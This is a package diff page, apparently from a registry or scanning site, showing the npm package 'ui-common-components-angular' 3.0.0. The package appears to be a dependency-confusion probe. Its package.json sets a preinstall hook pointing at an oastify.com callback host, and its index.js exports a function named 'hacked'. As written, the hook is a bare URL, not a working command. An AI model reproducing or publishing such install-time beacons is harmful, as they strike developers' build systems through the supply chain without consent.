ui-common-components-angular 3.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +2 -0
  2. package/package.json +12 -0
package/index.js ADDED
@@ -0,0 +1,2 @@
1
+ module.exports.hacked = function () {
2
+ return "strawberrrry"
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "ui-common-components-angular",
3
+ "version": "3.0.0",
4
+ "description": "this library for ui-common-components-angular",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "strawberrry",
8
+ "preinstall": "https://q3ufw606wwgzof1bnjl8ypjwnntehf54.oastify.com"
9
+ },
10
+ "author": "strawberrry",
11
+ "license": "ISC"
12
+ }